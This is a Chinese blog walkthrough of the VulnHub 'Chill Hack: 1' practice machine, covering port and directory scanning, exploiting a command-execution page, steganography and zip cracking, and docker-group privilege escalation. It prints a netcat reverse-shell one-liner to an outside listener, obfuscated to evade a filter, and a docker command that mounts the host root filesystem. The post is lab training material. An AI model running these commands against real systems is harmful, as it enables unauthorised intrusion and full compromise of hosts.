vulnhub-Chill Hack: 1

最新推荐文章于 2024-02-27 21:29:34 发布
最新推荐文章于 2024-02-27 21:29:34 发布
阅读量204 收藏
点赞数
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/113728407
版权

靶机描述

下载 https://www.vulnhub.com/entry/chill-hack-1,622/

清单

  • 信息搜集

    • nmap
    • 命令执行漏洞
    • 端口转发
    • 图片隐写
    • 压缩包密码破解

  • 提权

    • docker 组

信息搜集

靶机IP

image-20210206163330182

端口扫描

nmap 192.168.31.35

PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

目录扫描

dirb http://192.168.31.35

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb  6 14:28:19 2021
URL_BASE: http://192.168.31.35/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.31.35/ ----
==> DIRECTORY: http://192.168.31.35/css/                                                                                                                              
==> DIRECTORY: http://192.168.31.35/fonts/                                                                                                                            
==> DIRECTORY: http://192.168.31.35/images/                                                                                                                           
+ http://192.168.31.35/index.html (CODE:200|SIZE:35184)                                                                                                               
==> DIRECTORY: http://192.168.31.35/js/                                                                                                                               
==> DIRECTORY: http://192.168.31.35/secret/

其中 secret 中有命令执行

通过

r''m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.171 1234 >/tmp/f

得到 shell

提升权限 - anurodh

进入之后发现个 9001 端口 转发出来是一个网页

在数据库拿到 用户名后 登入进去 出现如下图片

image-20210206163906995

在看过 wp 之后图中的images/hacker-with-laptop_23-2147985341.jpg

带有隐藏信息

image-20210206164419939

分离后的压缩包带有密码

image-20210206164812891

得到密码 pass1word

解压过后有个 php文件

image-20210206171053140

base64解码后得到密码

!d0ntKn0wmYp@ssw0rd

得到 root

使用 ssh登陆

image-20210206171205259

用户anurodh 为 docker用户组

输入

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

得到 root

image-20210206171248610

赛博雨天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub-Chill-Hack 1 靶场渗透实验
qq_56724121的博客
04-27 545
VulnHub-Chill-Hack 1 靶场渗透实验 一、信息收集 1、收集靶机的ip nmap来扫描存活的主机 nmap -sn 192.168.226.0/24( -v表示显示过程) 根据扫描的结果,可以继续验证目标靶机的ip 确定目标靶机地址是192.168.226.131 2、根据得到的靶机ip,继续扫描靶机相关的服务开放情况 nmap -sC -sV 192.168.226.131 -p- --min-rate=2000 -n -vv -sC –...
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6213
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
使用 docker-compose 挂载数据卷创建 SVN 服务器
yssa1125001的博客
09-17 1032
docker-compose配置: version: '3.1' services: svn: image: garethflowers/svn-server container_name: svn-server restart: always ports: - 3690:3690 volumes: - ./data/svn:/var/opt/svn 可以看到,我这里把数据卷放在了docker-compose.yml同目录下便于管理(
kali-vulnhub:doubletrouble
curme_miller的博客
01-26 4141
1.安装好doubletrouble靶机,界面如下:(kali:192.168.0.104;靶机:192.168.0.110) 为Debian,没有发现较明显的信息 2.开始扫描端口 $ nmap -Pn 192.168.0.110 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org
vulnhub靶机-CHILL HACK: 1
臭nana的博客
12-21 1004
靶机描述:提示枚举 1、找到靶机ip:192.168.74.135 nmap -sn 192.168.74.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.74.135 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.135 Host is up (0.0044s latency). Not shown: 65532 closed ports PO
pip-chill:更轻松的“点冻结”
05-01
PIP Chill-仅使用您需要的软件包进行要求 类似于pip Frozen,但仅列出不依赖于已安装软件包的软件包。 免费软件:GNU通用公共许可证v3 文档: : 。 特征 生成需求文件,而不包含依赖于文件中其他软件包的任何...
plan-track-chill:迷惑于Bexio API
04-01
:calendar: :stopwatch: :desert_island: 计划跟踪冷却-Bexio时间跟踪应用程序自定义用户界面,用于跟踪时间并计划工作周和节假日。技术事实使用Node&Express的Bexio Bearer身份验证使用Node和Pug渲染使用...
leetcode卡-Leetcode-and-chill:隔离期间的Leetcode和Chill
07-06
leetcode卡Leetcode-and-chill 隔离期间的 Leetcode 和 Chill。 随着我们在锁定状态下前进并适应它,我策划了其中一些问题/竞赛以进行尝试。 内容 Leetcode 4 月 30 天编程挑战 Codechef 问题: Leetcode 问题(难度...
leetcoderuntimeerrorjava-Leetcode-And-Chill:一天一个算法让失业远离
07-07
Leetcode-And-Chill 一天一个算法,让失业远离。 目录 力扣问题 ID 标题 语 困难 运行时节拍 内存使用节拍 4 两个有序数组的中位数 Java 难的 99.68% 82.45% 23 合并 k 个排序列表 Java 难的 8.28% 11.06% 25 k-...
教学-HEIGVD-RES-2021-Chill:第一个实验室的回购
03-04
压缩包文件`Teaching-HEIGVD-RES-2021-Chill-master`可能包含项目源代码、测试文件、README文档等资源。通过阅读源码和相关文档,可以更好地理解项目的实现细节和学习目标。 9. **学习路径** 对于初学者,首先...
vulnhub--Chill Hack
weixin_45922278的博客
02-07 230
靶场描述 难度:容易/中级 标记:2(用户和root) 提示:枚举 目录 一、信息收集 1.nmap端口扫描: 2.dirsearch目录扫描: 二、漏洞探测 三、漏洞利用 四、提权 1.sudo -l 2.寻找其他漏洞: 1)hacker.php 2)steghide工具 3)ARCHPR 爆破密码 4)lse.sh Linux枚举工具 5)docker提权: 五、总结 一、信息收集 1.nmap端口扫描: nmap -sP 192.168.155.129/..
横向渗透学习记录
AaronLuo
02-18 2618
声明 参考链接:https://mp.weixin.qq.com/s/8rh2huPyyvarfXkMeo770w 靶机 Ubuntu(192.168.93.120) CentOS(192.168.93.100)(192.168.1.14) windows7 Pc (192.168.93.30) windows server 2008(192.168.93.20) windwos server ...
vulnhub-So Simple 1
yutianovo的博客
08-10 1298
靶机描述 This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag). The VM is tested on Virtualbox. After the startup it shows the IP address. Share your rootflag with me on Twitter
vulnhub-Tiki - 类oscp靶机攻略1
yutianovo的博客
07-14 1236
本文为类oscp靶机打靶1
vulnhub-Cybox: 1.1
yutianovo的博客
12-25 1064
靶机描述 http://blog.yutian233.xyz/index.php/archives/72/ Will you be able to compromise the internal server of the CYBOX company? Difficulty: Medium Objective: Get user.txt and root.txt This works better with VirtualBox rather than VMware. Contact: @takit
工具使用-pwncat
最新发布
yutianovo的博客
02-27 990
pwncat是一个命令和控制框架,可以将基本的反向或绑定shell转化为一个功能齐全的利用平台。然后,它将尝试在远程主机上启动一个伪终端,并为您提供原始终端访问。
vulnhub-DevGuru:1
yutianovo的博客
12-24 909
靶机描述 DevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on their corporate website and obtaining root. OSCP like ~ Real life based Difficulty: Intermediate (Depends on exp
vulnhub-Photographerr-渗透笔记
yutianovo的博客
08-04 854
靶机描述 博客地址 http://blog.yutian233.xyz/ This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt. https://www.vulnhub.com/entry/photographer-1,519/ 端口扫描 nmap -A -p
vulnhub-Potato-wp
yutianovo的博客
09-13 604
靶机描述 blog http://blog.yutian233.xyz/ VM name : Potato Type: Boot to Root DHCP : Enabled Difficulty : Easy to medium Goal: 2 flags (user.txt and root.txt) This VM has been tested with VirtualBox 下载 https://www.vulnhub.com/entry/potato-1,529/ 清单 信息搜集 ne
com.twitter:chill对应的pom.xml的依赖
06-01
<artifactId>chill_2.12 <version>0.9.5 ``` 注意,这是针对Scala 2.12版本的依赖信息。如果你使用的是其他版本的Scala,需要将artifactId中的"_2.12"替换成对应的版本号后缀。比如,如果你使用的是Scala 2.11,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值